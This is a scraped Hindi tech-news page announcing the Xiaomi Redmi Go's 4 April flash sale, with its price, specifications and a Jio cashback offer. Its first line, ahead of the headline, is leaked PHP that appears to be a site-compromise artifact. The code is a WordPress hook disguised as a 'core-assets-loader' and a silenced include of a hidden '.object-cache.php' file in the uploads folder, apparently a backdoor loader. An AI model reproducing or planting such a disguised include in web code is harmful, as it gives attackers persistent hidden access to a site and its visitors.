add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Xiaomi Redmi Go की अगली सेल 4 अप्रैल को – SOCH INDIA
Menu

टेक्नोलॉजी
Xiaomi Redmi Go की अगली सेल 4 अप्रैल को

nobanner

स्मार्टफोन मेकर शाओमी ने अपने रेडमी गो स्मार्टफोन की अगली सेल का एलान कर दिया है. फोन फ्लैश सेल की मदद से 4 अप्रैल को फ्लिपकार्ट और मी.कॉम पर उपलब्ध होगा. जिन्हें नहीं पता उन्हें बता दें कि ये कंपनी का पहला एंड्रॉयड गो स्मार्टफोन है. फोन को पिछले महीने 19 मार्च को लॉन्च किया गया था.

फोन की कीमत और स्पेक्स

फोन की कीमत 4499 रुपये है यानी की 5000 रुपये के नीचे आप इस बेहतरीन स्मार्टफोन को अपना बना सकते हैं. फोन में 5 इंच का 16:9 720P HD डिस्प्ले है. फोन में स्नैपड्रैगन 425 चिपसेट दिया गया है जो चार कोर्टेक्स A53 कोर के साथ आता है जो 1.4GHz है. फोन में 1 जीबी का रैम भी मिलता है जो 8 जीबी और 16 जीबी के स्टोरेज के साथ आता है.फोन में हाइब्रिड सिम स्लॉट है जो आपको सेकेंडरी सिम कार्ड और माइक्रो एसडी कार्ड की सुविधा देता है.

रिलायंस जियो की तरफ से फोन पर 2200 रुपये का कैशबैक और 100 जीबी तक मुफ्त में मोबाइल डेटा की सुविधा दी जा रही है. कैमरे की अगर बात करें तो फोन में 8 मेगापिक्सल का कैमरा है जो एलईडी फ्लैश और 5 मेगापिक्सल के फ्रंट शूटर कैमरे के साथ आता है. फोन की बैटरी 3000mAh की है.